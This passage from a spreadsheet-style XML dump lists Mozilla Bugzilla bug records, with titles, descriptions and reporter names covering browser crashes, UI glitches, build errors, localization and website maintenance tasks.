    <t>Followup to Bug 516453. Extend gFolderDisplay and gMessageDisplay to support Enigmail.</t>
  </si>
  <si>
    <t>CALENDAR-530165</t>
  </si>
  <si>
    <t>[Mozmill] Timezone test</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 et rv:1.9.2b3) Gecko/20091115 Firefox/3.6b3
Build Identifier: 
Timezone test.
Reproducible: Always</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-472853</t>
  </si>
  <si>
    <t>stm is not defined (module:history.js:187)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2
Build Identifier: bda40dfbac43
in e659d8eb6687 this error was introduced. i have a simple fix.
but returning stm should be handled on fennec too. since if the sql-statement will not finish correctly it should not be returned or even handed over to __defineGetter__ should it?
Reproducible: Always
Steps to Reproduce:
1. hp pull hg up</t>
  </si>
  <si>
    <t>markus.doits</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-183526</t>
  </si>
  <si>
    <t>mk5.org - uses document.all to access all content</t>
  </si>
  <si>
    <t>All the content at http://www.mk5.org/ is hidden behind a JS menu that needs the
nonstandard document.all object.</t>
  </si>
  <si>
    <t>WEBSITES-510011</t>
  </si>
  <si>
    <t>Labs 2.0 site: Need redirects for old project urls to new project locations</t>
  </si>
  <si>
    <t>As follows:
http://labs.mozilla.com/projects/bespin/ to http://labs.mozilla.com/bespin/
http://labs.mozilla.com/projects/weave/ to http://labs.mozilla.com/weave/
http://labs.mozilla.com/projects/firefox-personas/ to http://labs.mozilla.com/personas/
http://labs.mozilla.com/projects/prism/ to http://labs.mozilla.com/prism/
http://labs.mozilla.com/projects/ubiquity/ to http://labs.mozilla.com/ubiquity/
http://labs.mozilla.com/projects/test-pilot/ to http://labs.mozilla.com/testpilot/
http://labs.mozilla.com/projects/concept-series/ to http://labs.mozilla.com/conceptseries/
http://labs.mozilla.com/projects/snowl/ to http://labs.mozilla.com/snowl/
http://labs.mozilla.com/projects/jetpack/ to http://labs.mozilla.com/jetpack/
Archived Projects:
http://labs.mozilla.com/projects/chromatabs/ to http://labs.mozilla.com/chromatabs/
http://labs.mozilla.com/projects/the-coop/ to http://labs.mozilla.com/the-coop/
http://labs.mozilla.com/projects/operator/ to http://labs.mozilla.com/operator/
http://labs.mozilla.com/projects/joey/ to http://labs.mozilla.com/joey/</t>
  </si>
  <si>
    <t>CORE-335995</t>
  </si>
  <si>
    <t xml:space="preserve">Crash [@ nsHTMLEditor::GetInlinePropertyBase] involving designMode removeformat </t>
  </si>
  <si>
    <t>Before the crash I see this assertion:
###!!! ASSERTION: Null current node in an iterator that's not done!: 'mCurNode' file /Users/admin/trunk/mozilla/content/base/src/nsContentIterator.cpp line 1186</t>
  </si>
  <si>
    <t>mozeditor</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-416625</t>
  </si>
  <si>
    <t>Ability to disable stats dashboard from admin cp</t>
  </si>
  <si>
    <t>There should be an option in Site Config to disable the stats dashboard during periods of high load or for other reasons as we have with several other functions of the site.</t>
  </si>
  <si>
    <t>SEAMONKEY-308866</t>
  </si>
  <si>
    <t>OS/2 needs new SeaMonkey BMPs in xpinstall\wizard\os2\setuprsc</t>
  </si>
  <si>
    <t>The install wizard on OS/2 still contains the old Mozilla graphics as BMPs in
xpinstall\wizard\os2\setuprsc. The files bitmap1.bmp and downloadLogo.bmp need
to be converted to OS/2 BMP format from the corresponding files in
xpinstall\wizard\windows\setuprsc. At the moment it probably does not make much
sense but as soon as the final SeaMonkey graphics have been decided this
should be done.</t>
  </si>
  <si>
    <t>SEAMONKEY-281642</t>
  </si>
  <si>
    <t>Access key conflicts in Server Settings pane</t>
  </si>
  <si>
    <t>Bug 218902 introduced three acces key conflicts to this pane:
- _N_ever conflicts with User _N_ame
- TLS if _a_vailable conflicts with _A_dd Account
- SS_L_ conflicts with _L_ocal Directory</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-411744</t>
  </si>
  <si>
    <t>Talos cannot install builds on Leopard (Mac OSX 10.5)</t>
  </si>
  <si>
    <t>The current mechanism Talos uses to install builds on Mac OS X won't work on 10.5.  To get around this we need to use an adapted version of Bob's expect.ex script.
1. Attempt to install a build by using installdmg.sh on Leopard
= Actual =
Fails to install
= Expected = 
Installs</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-526094</t>
  </si>
  <si>
    <t>[bg] Thunderbird 3 landing page localization</t>
  </si>
  <si>
    <t>CORE-53478</t>
  </si>
  <si>
    <t>Can't hide menus on the Mac.</t>
  </si>
  <si>
    <t>In mailnews we have code that hides menus based on the context by doing
menuitem.setAttribute(hidden true)
this works on Windows and Linux but not the mac.
For example if you run mail and double click on a message you will get the
standalone message window.  In the View menu the Sort By and Messages menus
shouldn't be there.  Nor should the Message menu item.
Likewise in the mail 3 pane in the Messages menu the Reply to Newsgroup
menuitem should only be there when a news message is selected.  Instead it's
always there.
In Editor the Check spelling menuitem in the edit menu shouldn't show up unless
the spell checker is installed.  In mozilla builds it's still there.</t>
  </si>
  <si>
    <t>NSS-353577</t>
  </si>
  <si>
    <t>Delete dead PURE_STAN code code outside NSS_3_4_CODE and NSS_CLASSIC code</t>
  </si>
  <si>
    <t>The NSS libraries contain a lot of code conditionally compiled for PURE_STAN_CODE or PURE_STAN_BUILD . I'm not sure we need this code .  Removal patch forthcoming.</t>
  </si>
  <si>
    <t>FIREFOX-222352</t>
  </si>
  <si>
    <t>Closing and reopening window breaks keyword shortcuts.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5) Gecko/20031007 Firebird/0.7
I have a keyword shortcut to search google. So when I type g  I get the
search results from google. When I close and reopen the browser window g
 stops working and starts doing I feel lucky searches on 'g '.
It happens with every keyword shortcut even those without search options.
Reproducible: Always
Steps to Reproduce:
1. Close window
2. Try keyword search
Actual Results:  
An I feel lucky search happens on the keyword and it's options.
Expected Results:  
What the keyword feature should do.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-396617</t>
  </si>
  <si>
    <t>Investigate source(s) of Litmus slowdowns</t>
  </si>
  <si>
    <t>Tomcat I have noticed of late that Litmus can be very slow. Apparently the story we usually get is that it is because of whatever else is running on the machine is slowing things down. Can Litmus get upgraded hardware or can we do something to improve things a bit here?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-28959</t>
  </si>
  <si>
    <t>Posting messages to netscape.public.mozilla.webtools always gets a bounce message.</t>
  </si>
  <si>
    <t>When I post messages to the newsgroup I now always get a bounce message.  I 
will attach one of the bounces.
I *think* this just means that there is a bogus address on the list that should
be removed but I'm not sure.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-455887</t>
  </si>
  <si>
    <t>Disable search term highlighting on MDC</t>
  </si>
  <si>
    <t>To do this we need to add this to the LocalSettings.php file:
$wgEnableSearchHighlight = false
This will turn off a feature that annoys most of our users.</t>
  </si>
  <si>
    <t>CORE-288587</t>
  </si>
  <si>
    <t>crash while viewing Real videos</t>
  </si>
  <si>
    <t>While viewing videos in real content Camino crashes for me. I'm using a build
from CVS about 3 hours ago (see filing time for this bug).
This is almost certainly caused by a problem with the patch by Aaron Leventhal
for bug 245349.
I bet the issue is that nsObjectFrame::IsFocusable writes to *aTabIndex without
checking whether aTabIndex is its default value (null). - bz</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-80993</t>
  </si>
  <si>
    <t>Mouse click /attach or /join in chatzilla no longer works</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:0.9+) Gecko/20010515
BuildID:    2001051504
Reproducible: Always
Steps to Reproduce:
1. Tools | IRC Chat
2. Click on moznet in the welcome message -&gt; nothing happens
3. /attach moznet
4. /list
5. Click on #mozillazine -&gt; nothing happens
Actual Results:  Steps 2 &amp; 5 fail as described in 2001-05-15-06-trunk. Worked
with 2001-05-13-10-trunk.
Expected Results:
2: /attach moznet
5. /join #mozillazine</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-272106</t>
  </si>
  <si>
    <t>Fix documents related to Bugzilla (thanks to REORG)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Clicking on any of the 4 links to find unconfirmed bugs Linux only - Mac only -
Windows only - All gives Zarro Boogs found. The error comes from
product=Browser&amp;product=MailNews in the URL. These product categories no longer
seem to be in Bugzilla.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.mozilla.org/quality/help/unconfirmed.html
2. Go to the section on Get set up Click on any of the links in the second
bullet point.
Actual Results:  
No uncomfirmed bugs reported. Whats all this then!!?
Expected Results:  
reported unconfirmed bugs from bugzilla. 
https://bugzilla.mozilla.org/buglist.cgi?bug_status=UNCONFIRMED&amp;product=Firefox&amp;product=Thunderbird</t>
  </si>
  <si>
    <t>sameer</t>
  </si>
  <si>
    <t>CORE-459604</t>
  </si>
  <si>
    <t>nsDOMWindowUtils::SendMouseEvent doesn't accept points outside the viewport</t>
  </si>
  <si>
    <t>Go to nytimes.com should be able to click on links on the page but can't.
I think this is probably a event/content/layout bug.  Needs a reduced (non-fennec) testcase.</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD-863901</t>
  </si>
  <si>
    <t>Create API endpoints to list available regions and carriers</t>
  </si>
  <si>
    <t>ashort</t>
  </si>
  <si>
    <t>charmston</t>
  </si>
  <si>
    <t>CORE-74631</t>
  </si>
  <si>
    <t>D&amp;D happens on a single-click intended for a drag-selection</t>
  </si>
  <si>
    <t>In the URL bar HTML form TEXTAREAs and other text input widgets I can start
dragging to make a selection and suddenly I'll be dragging the first character
I selected around. This is terribly annoying and is completely ridiculous on a
platform that supports copy and paste with simple mouse clicks. The ability to
drag&amp;drop text should be configurable or disabled IMO. At least make it so that
I can select text without moving it around please.</t>
  </si>
  <si>
    <t>CORE-280683</t>
  </si>
  <si>
    <t>Implement onpaste for text controls</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
See: http://msdn.microsoft.com/workshop/author/dhtml/reference/events/onpaste.asp
Reproducible: Always
Steps to Reproduce:
Actual Results:  
There is no onpaste event.
Expected Results:  
There should be an onpaste event.</t>
  </si>
  <si>
    <t>bfults</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-436155</t>
  </si>
  <si>
    <t>Treehydra needs to override uneval and throw an exception</t>
  </si>
  <si>
    <t>The current behavior of getting stuck for a while while lazy objects get unevaled until we run out of RAM isn't quite optimal.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-486234</t>
  </si>
  <si>
    <t>Give changes json file name for history passwords</t>
  </si>
  <si>
    <t>From bug 486230 comment 2:
(In reply to comment #1)
&gt; 2009-03-31 19:49:55    HistoryTracker       DEBUG    Saving json to disk:
&gt; weave/changes/none.json
&gt; 2009-03-31 19:49:57    PasswordTracker      DEBUG    Saving json to disk:
&gt; weave/changes/none.json
&gt; 
&gt; I'm guessing those trackers don't set the file attribute.. bug?
Wow that's a nasty bug.  I guess it isn't visible during the first sync
session since we don't reload the file until the next browser startup.</t>
  </si>
  <si>
    <t>BUGZILLA-238780</t>
  </si>
  <si>
    <t>Edit versions should reject newline characters</t>
  </si>
  <si>
    <t>This is a serious problem. my browser is rather drunk and it just made a big mess.</t>
  </si>
  <si>
    <t>CORE-96466</t>
  </si>
  <si>
    <t>Content of the phpBB bulletin board administration section is not displaying properly. It should be some kind of table but it's just floating text!</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible MSIE 5.5 Windows NT 5.0)
BuildID:    20010821
The administration section of the board is usually displayed in a table. Now 
it's just concatenated text of the table columns! It really doesn't look like a 
table but it looks like floating text. No columns and no rows at all.
With other browsers even with Mozilla 0.9.3 and 0.9.3+ (at least until build 
20010813) it works correct!
Reproducible: Always
Steps to Reproduce:
1. Go to the provided test URL using Mozilla &gt;= 20010820
2. Go to the provided test URL using Mozilla &lt;= Mozilla 0.9.3
3. See the difference!
Actual Results:  Wrong display of page content.
Expected Results:  Instead of floating text there should be some kind of 
tables appearing.</t>
  </si>
  <si>
    <t>ralfq</t>
  </si>
  <si>
    <t>CORE-345822</t>
  </si>
  <si>
    <t>Implement required attribute</t>
  </si>
  <si>
    <t>The required attribute is simple to implement.  Patch coming right up.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-327775</t>
  </si>
  <si>
    <t>mozilla.org product description for bugzilla is out of date</t>
  </si>
  <si>
    <t>The current mozilla.org product description reads:
  The running of the mozilla.org organization and its servers 
  (Website content bugs will belong in the Website product)
This doesn't cover much of what the product components cover.
Perhaps a more complete (but too long) description would be:
Issues relating to the administration and governance of the mozilla project including CVS accounts server admin Talkback Tinderbox the Mozilla Store software licensing governance community support ... Note: Website content bugs will belong in the Website product</t>
  </si>
  <si>
    <t>zak</t>
  </si>
  <si>
    <t>FIREFOX-414285</t>
  </si>
  <si>
    <t>Refactor AutoCompleteTagsSearch token splitting code and persist tokens</t>
  </si>
  <si>
    <t>It would be useful to save the tokens around if another search needed it other than just the TagsSearch. E.g. full history search if it wanted to search on multiple words.</t>
  </si>
  <si>
    <t>TOOLKIT-347140</t>
  </si>
  <si>
    <t>blocklisting broken sometime after implementation</t>
  </si>
  <si>
    <t>hasAttribute is failing in the blocklist code... the blocklist code hasn't changed so something else must have. I've got it working in my tree now and will submit a patch within a day.</t>
  </si>
  <si>
    <t>SEAMONKEY-258642</t>
  </si>
  <si>
    <t>Unused functions [PRUni]charPtrArrayTo[C]StringArray &amp; [C]StringArrayTo[PRUni]charPtrArray</t>
  </si>
  <si>
    <t>These functions are not used and could be removed (or #if 0:ed)
http://lxr.mozilla.org/seamonkey/ident?i=PRUnicharPtrArrayToStringArray
http://lxr.mozilla.org/seamonkey/ident?i=StringArrayToPRUnicharPtrArray</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-297287</t>
  </si>
  <si>
    <t>no picture but plain text is displayed if you click on any link Bild ansehen</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050609 Firefox/1.0+
On the mentioned URL things are offered to be given away for free. Some 
offerors also add a picture. They have a link Bild ansehen beneath their 
eMail address.
IE: When openeing this link with IE you get the picture displayed in a 
separate window.
Firefox:
When opening this link in a new window you do not get the picture but plain 
text displayed. It contauns also control characters so I cannot copy an 
example.
Reproducible: Always
Steps to Reproduce:
1. go to http://www.awg-rems-murr.de/fundgrube/index.php3
2. search link Bild ansehen
3. Do a left click (open in new window) on it
Actual Results:  
A window opens and you get the text instead of the picture
Expected Results:  
dispaly the linked picture as IE does</t>
  </si>
  <si>
    <t>Engel.NFH</t>
  </si>
  <si>
    <t>PLUGINS_GRAVEYARD-360313</t>
  </si>
  <si>
    <t>Java applet password field gains focus but cannot be typed in.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.8) Gecko/20061030 SeaMonkey/1.0.6
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.8) Gecko/20061030 SeaMonkey/1.0.6
This is a problem when connecting to the Java applet for St. Bernard Software's iPrism. 
This applet works fine in Mozilla 1.7.13. It does not work in SeaMonkey and does not work in Firefox 2.0. Because this applet is broken in new versions of Mozilla products and works fine in older versions I can only speculate that there has been a change to the code that breaks this.
Reproducible: Always
Steps to Reproduce:
1. Go to IP for iPrism device
2. Attempt to login login applet launches
3. Username can be typed but password field cannot be typed in
Actual Results:  
Could not type in password field. Had to cancel the dialog to get back to SeaMonkey's window. Login fails because the correct password cannot be typed in.
Expected Results:  
I should have been able to enter the password and click login.
No special configuration as mentioned applet works in Mozilla 1.7.13</t>
  </si>
  <si>
    <t>jgrubic</t>
  </si>
  <si>
    <t>CORE-398100</t>
  </si>
  <si>
    <t>Misspelled name in about:license (BÃ«nzli instead of BÃ¼nzli)</t>
  </si>
  <si>
    <t>Created attachment 282942
fix
Misspelling introduced in bug 380017 - though only for the 1.8 branch starting with version 1.8.1.5 (see bug 380017 comment #10).
Gerv: In case this misspelling was caused by a script: has that bug been fixed (so that it doesn't happen again)?
Branch drivers: Risk-less (but legally required) typo correction.</t>
  </si>
  <si>
    <t>BUGZILLA-188656</t>
  </si>
  <si>
    <t>Change required mysqld minimum to 3.23.41</t>
  </si>
  <si>
    <t>2.17 exposes a bug in pre-3.23.41 versions of mysqld where
COUNT(DISTINCT(thing)) does not return 0 if thing is the result of a LEFT JOIN
that could not find any rows.
checksetup needs to bump the minimum to 3.23.41</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-397246</t>
  </si>
  <si>
    <t>CVS-based ChatZilla language packs</t>
  </si>
  <si>
    <t>In bug 394315 I introduced source L10n (i.e. CVS-based L10n) for ChatZilla. Though the approach taken there works it's not the ideal way to deal with this esp. as it results in extensions with the same ID but different content (due to different localizations).
In IRC and newsgroup discussions we seemed to get to an agreement that the best solution for the future is to go with leaving the core ChatZilla bundling en-US and have language packs for other locales which are marked dependent on the main ChatZilla package for those applications that can deal with extension dependency.
We also should get AMO to support such extension language packs and even offer compound ChatZilla+locale packages as so-called Multiple Item Packages for apps based on toolkit 1.8 and higher.
The target is to get a solution with this for SeaMonkey 2.0 locale repackaging and as a second goal also create XPIs that can be used for Add-On installation on all apps that ChatZilla supports. I'll try to work on those goals in this order.
See the thread in the URL of this bug for the relevant newsgroup discussion.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-518413</t>
  </si>
  <si>
    <t>Permission denied pushing to releases/mozilla-1.9.2</t>
  </si>
  <si>
    <t>I just got commit access to hg.mozilla.org and I think my account is not quite set up correctly.  Here are the symptoms (there is one outgoing changeset in this tree):
$ hg push --verbose
running ssh hg.mozilla.org hg -R releases/mozilla-1.9.2 serve --stdio
pushing to ssh://hg.mozilla.org/releases/mozilla-1.9.2
searching for changes
1 changesets found
remote: abort: could not lock repository /repo/hg/mozilla/releases/mozilla-1.9.2: Permission denied
abort: unexpected response: empty string
I need to be able to push to mozilla-central releases/mozilla-1.9.2 releases/mozilla-1.9.1 and the try server.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-173432</t>
  </si>
  <si>
    <t>carrefour-multimedia.com - bad sniffing</t>
  </si>
  <si>
    <t>This page asks for IE 5 or Netscape 6.
Contact :  webmaster@carrefour.com</t>
  </si>
  <si>
    <t>fbonny</t>
  </si>
  <si>
    <t>CORE-387224</t>
  </si>
  <si>
    <t>ExplainLiveExpectedGarbage should give JS traces when available</t>
  </si>
  <si>
    <t>Created attachment 271345
patch
For JS objects ExplainLiveExpectedGarbage can give all ways an object is reachable and thus show what references are being missed.
I have a patch to do this although it's not quite committable since it requires that DEBUG_CC be defined in two independent headers.  A few other things about it are ugly as well although it *is* modular and thus quite simple...</t>
  </si>
  <si>
    <t>TOOLKIT-661573</t>
  </si>
  <si>
    <t>Telemetry</t>
  </si>
  <si>
    <t>Telemetry: Do not record/send data in private mode</t>
  </si>
  <si>
    <t>Since histograms can be viewed via about:telemetry it would be nice to wipe them when leaving private mode.</t>
  </si>
  <si>
    <t>CORE-33391</t>
  </si>
  <si>
    <t>arguments.callee broken for joined function objects</t>
  </si>
  <si>
    <t>See the news thread for test case and diagnosis.  Patch coming up.
/be</t>
  </si>
  <si>
    <t>CORE-403347</t>
  </si>
  <si>
    <t>cvs remove mozilla/extensions/spellcheck/locales/en-US/myspell</t>
  </si>
  <si>
    <t>This directory should have also been removed after the change to Hunspell.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-692837</t>
  </si>
  <si>
    <t>Create Testing / Peptest component</t>
  </si>
  <si>
    <t>The component description should be:
Peptest is an automated testing framework designed to test whether or not the application's UI thread remains responsive while performing a variety of actions. Please file bugs here for issues with the framework itself. For bugs in existing tests or for adding new tests file bugs against the component to be tested.
Let me know if you need more info.</t>
  </si>
  <si>
    <t>CORE-281744</t>
  </si>
  <si>
    <t>Remove dead code and silly plugin code</t>
  </si>
  <si>
    <t>Found a dead file and some code that used the nsIMemory service for no reason
patch coming up.</t>
  </si>
  <si>
    <t>CORE-302775</t>
  </si>
  <si>
    <t>extractContents doesn't work if start and end node of a Range object is an attribute node [@  nsContentSubtreeIterator::Init]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 fr rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)
Just lets me show you a bit of code :
    crashRange
      function crash() {
        su = document.getElementsByTagName('input')[0].getAttributeNode('value')
        ran = document.createRange()
        ran.setStart(su 0)
        ran.setEnd(su 1)
        ran.extractContents() // fx crashs on this line
      }
What to say more ?
In fact the bug is in nsContentIterator.cpp on line 1334 :
1331  // short circuit when start node == end node
1332  if (startParent == endParent)
1333  {
1334    cChild = cStartP-&gt;GetChildAt(0)
(notice that my Range shouldn't be collapsed)
The bug is that cStartP object is not good. its mRawPtr property contain 0x00
wherewas it should not.
The value of cStartP was that assigned a few lines earlier by the return of the
function do_QueryInterface.
Reproducible: Always
Steps to Reproduce:
1. Create a new Range
2. assign its boundary points like to select the value of an attribute.
3. Call extractContents. :)
Actual Results:  
Firefox crash. (seg fault)
It try to access the memory at the adress 0x00.
eax = 0x0
mov edx [eax]
Expected Results:  
It should return the content of the attribut selected.
firefox crash with any versions and on any OS.</t>
  </si>
  <si>
    <t>celelibi</t>
  </si>
  <si>
    <t>TOOLKIT-421412</t>
  </si>
  <si>
    <t>Get rid of _adjustWidth hack</t>
  </si>
  <si>
    <t>We can use flex to push the icon to the right but we need to make sure the ellipsis show up correctly..</t>
  </si>
  <si>
    <t>CORE-417533</t>
  </si>
  <si>
    <t>Resizing linked images fails in contentEditable elements</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: 
Resizing of linked images fails in a contentEditable element.
Reproducible: Always
Steps to Reproduce:
1. Open the attached URL.
2. Try resizing the image.
3. Observe that it produces links and doesn't resize correctly.
Actual Results:  
Can't resize images. It's impossible or very buggy.
Expected Results:  
Should be resized just like a normal image element without an link.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-449025</t>
  </si>
  <si>
    <t>fy-NL / Frisian</t>
  </si>
  <si>
    <t>wrong accesskey in file enginemanager.</t>
  </si>
  <si>
    <t>Created attachment 332204
enginemanager.dtd
wrong accesskey in file enginemanager.</t>
  </si>
  <si>
    <t>THUNDERBIRD-397097</t>
  </si>
  <si>
    <t>Account Manager Preferences and Import Dialogs: Several labels are not correctly marked up for accessibility</t>
  </si>
  <si>
    <t>On several pages of the Account Manager Preferences and Import Wizard dialogs there are several labels that are not roperly marked up for accessibility. For example none of the radio groups have a properly assigned label. Screen Readers therefore cannot read the associated prompt with these radio buttons.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-419386</t>
  </si>
  <si>
    <t>Change the wiki.m.o favicon to a non-generic-Mozilla one</t>
  </si>
  <si>
    <t>See the URL for the favicon to use.</t>
  </si>
  <si>
    <t>MARKETING-858912</t>
  </si>
  <si>
    <t>Trademark Violation: Passing off site as Firefox Related</t>
  </si>
  <si>
    <t>Created attachment 734226
Screenshot
URL: http://surveycentral.corerhythums.com/home.html
I found this as a pop-under on my browser so not sure which site triggered it. Additionally it also seems to be impossible to reproduce by going back to the URL so I'm including a screenshot as an attachment on this bug report.</t>
  </si>
  <si>
    <t>CORE-70088</t>
  </si>
  <si>
    <t>test please ignore</t>
  </si>
  <si>
    <t>msanz</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-505701</t>
  </si>
  <si>
    <t>Do XULRunner 1.9.1.1 and 1.9.1.2 releases</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #502915 +++</t>
  </si>
  <si>
    <t>CORE-173586</t>
  </si>
  <si>
    <t>[FIX]universal selector * is not prepended to pseudo elements</t>
  </si>
  <si>
    <t>universal selector * is appended to pseudo classes but not to pseudo elements.
See the testcase.</t>
  </si>
  <si>
    <t>vladimire</t>
  </si>
  <si>
    <t>CORE-319068</t>
  </si>
  <si>
    <t>nsTArray::IndexOf and friends should support an argument of another type</t>
  </si>
  <si>
    <t>nsTArray::IndexOf and friends should support an argument of another type.
If nsTArray::elem_type defines operator==(const some_other_type&amp;) then we can implement a version of IndexOf that takes a |const some_other_type&amp;| as an input parameter.  Same goes for LastIndexOf and RemoveElement.
Likewise nsTArray methods that take a Comparator might benefit from supporting a Comparator that compares nsTArray::elem_type against some_other_type.
The use case here is probably nsTArray &gt; since it would be inconvenient to construct a nsRefPtr object in order to call IndexOf LastIndexOf and RemoveElement on an instance of such a nsTArray.</t>
  </si>
  <si>
    <t>NSS-183350</t>
  </si>
  <si>
    <t>Rev. 1.4 of lib/softoken/fipstest.c broke Mac build and introduced compiler warnings on other platforms.</t>
  </si>
  <si>
    <t>In rev. 1.4 of lib/softoken/fipstest.c the const modifier
was added to several unsigned char arrays.  These arrays are
used to initialize the 'data' fields of some SECItem structure
passed as the 'input' argument to RSA_Sign or passed as the
'hash' argument to RSA_CheckSign.  All three of these have
the 'unsigned char *' type.  Therefore it is problematic to
set them to const unsigned char arrays.  These are compiler
errors on the Mac and compiler warnings on other platforms.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-409716</t>
  </si>
  <si>
    <t>please publish revision 9281
http://viewvc.svn.mozilla.org/vc?view=rev&amp;revision=9281
Thanks</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-456247</t>
  </si>
  <si>
    <t>Add option to streamMessage to disallow streaming over the network</t>
  </si>
  <si>
    <t>Created attachment 339637
patch v1
Currently streamMessage will stream from the network even if we're offline or we don't want to. This isn't always desirable. The patch aims to fix this.
The patch basically does two things --
- it allows streaming over the network in case 
This is a fairly straightforward patch with some code shuffled around and a bit of the control flow changed. There is only one cache lookup now.
David -- is this worth getting in for beta 1? Also right now I've tried to keep as similar a behaviour as possible for the search component. Jeff mentioned that there should be a UI option whether to allow the component to download over the network. What do you think of such a thing post beta 1?
(There are some changes that are just whitespace diff -w didn't figure them out though)</t>
  </si>
  <si>
    <t>CORE-87819</t>
  </si>
  <si>
    <t>Transparent GIFs with transparency on all four sides render non-transparent portions against the left and top sides</t>
  </si>
  <si>
    <t>With some (but not all) transparent GIFs mozilla renders the non-transparent
portions of the GIF against the top and left edges instead of twoards the center
of the GIF as it should. Please see the URL for an example.</t>
  </si>
  <si>
    <t>mikol</t>
  </si>
  <si>
    <t>SEAMONKEY-3901</t>
  </si>
  <si>
    <t>want ability to forward message/rfc822 attachments</t>
  </si>
  <si>
    <t>Consider a message for example a bounce message which has an imbedded
message/rfc822.  The user can click on the paperclip button then double-click
on the imbedded message/rfc822 to display the imbedded message.  Unfortunately
the imbedded message cannot be forwarded.
There should be some way to forward the imbedded message/rfc822 as if it were a
top-level message.</t>
  </si>
  <si>
    <t>CORE-37206</t>
  </si>
  <si>
    <t>Need XBL bindings and style for toggable buttons.</t>
  </si>
  <si>
    <t>Need XBL bindings and style for toggable buttons. We need to use these in the 
editor toolbar.</t>
  </si>
  <si>
    <t>SEAMONKEY-35186</t>
  </si>
  <si>
    <t>non-MD dependencies do not work in objdirs</t>
  </si>
  <si>
    <t>The make depend command fails when building in an objdir.
This seems to be because the MKDEPEND_DIR variable is not
set correctly.  Running the command make depend produces:
    phoenix.cmsms.vt.edu&gt; make depend
    cd ./config make nsinstall
    make[1]: Entering directory `/scratch/jlnance/build/config'
    make[1]: `nsinstall' is up to date.
    make[1]: Leaving directory `/scratch/jlnance/build/config'
    cd /scratch/jlnance/mozilla/mkdepend make
    /scratch/jlnance/mozilla/mkdepend: No such file or directory
    make: *** [/scratch/jlnance/mozilla/mkdepend/mkdepend] Error 1
but running the command:
    make MKDEPEND_DIR=/scratch/jlnance/build/config/mkdepend depend
works fine.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-326532</t>
  </si>
  <si>
    <t>Ampersand in bookmark keyworded search string doesn't get URL encoded properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051229 Camino/1.0b2
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051229 Camino/1.0b2
I have a bookmark with a keyword set up for Google search (the bookmark is http://www.google.com.au/search?hl=en&amp;q=%s&amp;btnG=Google+Search&amp;meta= and the keyword is 'goo').  When I type the following into the address bar
